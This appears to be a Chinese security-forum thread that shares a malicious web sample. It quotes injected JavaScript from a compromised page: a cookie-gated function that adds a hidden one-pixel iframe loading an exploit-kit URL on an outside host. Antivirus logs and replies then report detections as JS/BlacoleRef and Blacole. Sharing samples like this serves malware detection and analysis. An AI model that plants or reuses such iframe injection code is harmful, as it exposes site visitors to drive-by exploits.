www.newsalem.com/shallotte/floodal/24.htm

fireold

www.newsalem.com/shallotte/floodal/24.htm

function zzzfff() {
    var geia = document.createElement('iframe');

    geia.src = 'http://nss-pbr.com/showcall-services.com/rel.php';
    geia.style.position = 'absolute';
    geia.style.border = '0';
    geia.style.height = '1px';
    geia.style.width = '1px';
    geia.style.left = '1px';
    geia.style.top = '1px';

    if (!document.getElementById('geia')) {
        document.write('<div id=\'geia\'></div>');
        document.getElementById('geia').appendChild(geia);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

avira

2014/9/25 上午 06:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\24[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作：
      發生錯誤，檔案未刪除。錯誤識別碼：26003.
      檔案無法刪除！.
      嘗試使用 ARK 程式庫執行動作.
      檔案會移動至 '495af027.qua' 名稱底下的隔離區目錄!

2014/9/25 上午 06:41 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        817
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2014/9/25 上午 06:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\24[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.W.320 [virus]'
      執行的動作：傳輸至掃描程式

2014/9/25 上午 06:40 [Web Protection] 發現惡意程式碼
      從 URL "http://www.newsalem.com/shallotte/floodal/24.htm" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]。
      已採取動作：已略過

2014/9/25 上午 06:39 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\24[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.W.320 [virus]'
      執行的動作：拒絕存取

2014/9/25 上午 06:39 [Web Protection] 發現惡意程式碼
      從 URL "http://www.newsalem.com/shallotte/floodal/24.htm" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]。
      已採取動作：已略過

2014/9/25 上午 06:39 [Web Protection] 發現惡意程式碼
      從 URL "http://www.newsalem.com/shallotte/floodal/24.htm" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]。
      已採取動作：封鎖的檔案

fsis

Mr_Knight

chrome拦截

清道夫900

sep ips拦截。

z紫f风l铃

ESET杀

fuzhk

JS/Exploit-Blacole.ht

fireold